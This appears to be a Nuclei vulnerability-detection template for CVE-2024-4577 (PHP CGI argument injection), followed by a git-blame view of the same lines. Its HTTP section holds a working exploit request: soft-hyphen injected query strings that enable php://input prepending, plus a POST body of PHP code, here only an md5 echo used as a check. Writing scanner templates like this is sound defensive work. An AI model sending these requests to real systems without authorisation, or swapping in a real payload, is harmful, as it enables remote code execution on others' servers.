nuclei-templates/http/cves/2024/CVE-2024-4577.yaml

id: CVE-2024-4577

info:
  name: PHP CGI - Argument Injection
  author: Hüseyin TINTAŞ,sw0rk17,securityforeveryone,pdresearch
  severity: critical
  description: |
    PHP CGI - Argument Injection (CVE-2024-4577) is a critical argument injection flaw in PHP.
  impact: |
    Successful exploitation could lead to remote code execution on the affected system.
  remediation: |
    Apply the vendor-supplied patches or upgrade to a non-vulnerable version.
  metadata:
    verified: true
  tags: cve,cve2024,php,cgi,rce

http:
  - method: POST
    path:
      - "{{BaseURL}}/php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
      - "{{BaseURL}}/index.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
      - "{{BaseURL}}/test.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
      - "{{BaseURL}}/test.hello?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"

    body: |
      <?php echo md5("CVE-2024-4577"); ?>

    stop-at-first-match: true
    matchers:
      - type: word
        part: body
        words:
          - "3f2ba4ab3b260f4c2dc61a6fac7c3e8a"
# digest: 4a0a0047304502202f2c58605604d971b9179343f2f392f5b017faff6fc579a6174baa96cc2bccdd0221008d95bd2cfed96674e0cb86a73bcb16796d8d5a4910d661d7d088a5b4c14adec7:922c64590222798bb761d5b6d8e72950
add cve-2024-4577 2024-06-07 15:28:59 +00:00			`id: CVE-2024-4577`

			`info:`
Update CVE-2024-4577.yaml 2024-06-09 19:26:25 +00:00			`name: PHP CGI - Argument Injection`
			`author: Hüseyin TINTAŞ,sw0rk17,securityforeveryone,pdresearch`
			`severity: critical`
add cve-2024-4577 2024-06-07 15:28:59 +00:00			`description: \|`
updated description 2024-06-09 19:40:14 +00:00			`PHP CGI - Argument Injection (CVE-2024-4577) is a critical argument injection flaw in PHP.`
Update CVE-2024-4577.yaml 2024-06-09 19:26:25 +00:00			`impact: \|`
			`Successful exploitation could lead to remote code execution on the affected system.`
			`remediation: \|`
			`Apply the vendor-supplied patches or upgrade to a non-vulnerable version.`
Update CVE-2024-4577.yaml 2024-06-09 19:27:20 +00:00			`metadata:`
			`verified: true`
Update CVE-2024-4577.yaml 2024-06-09 19:26:25 +00:00			`tags: cve,cve2024,php,cgi,rce`
add cve-2024-4577 2024-06-07 15:28:59 +00:00
Update CVE-2024-4577.yaml 2024-06-09 19:45:25 +00:00			`http:`
Update CVE-2024-4577.yaml 2024-06-09 19:26:25 +00:00			`- method: POST`
			`path:`
			`- "{{BaseURL}}/php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"`
			`- "{{BaseURL}}/index.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"`
			`- "{{BaseURL}}/test.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"`
			`- "{{BaseURL}}/test.hello?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"`
add cve-2024-4577 2024-06-07 15:28:59 +00:00
Update CVE-2024-4577.yaml 2024-06-09 19:26:25 +00:00			`body: \|`
			`<?php echo md5("CVE-2024-4577"); ?>`
add cve-2024-4577 2024-06-07 15:28:59 +00:00
Update CVE-2024-4577.yaml 2024-06-09 19:26:25 +00:00			`stop-at-first-match: true`
add cve-2024-4577 2024-06-07 15:28:59 +00:00			`matchers:`
			`- type: word`
Update CVE-2024-4577.yaml 2024-06-09 19:26:25 +00:00			`part: body`
add cve-2024-4577 2024-06-07 15:28:59 +00:00			`words:`
Update CVE-2024-4577.yaml 2024-06-09 19:26:25 +00:00			`- "3f2ba4ab3b260f4c2dc61a6fac7c3e8a"`
Auto Template Signing [Sun Jun 9 19:45:30 UTC 2024] :robot: 2024-06-09 19:45:30 +00:00			`# digest: 4a0a0047304502202f2c58605604d971b9179343f2f392f5b017faff6fc579a6174baa96cc2bccdd0221008d95bd2cfed96674e0cb86a73bcb16796d8d5a4910d661d7d088a5b4c14adec7:922c64590222798bb761d5b6d8e72950`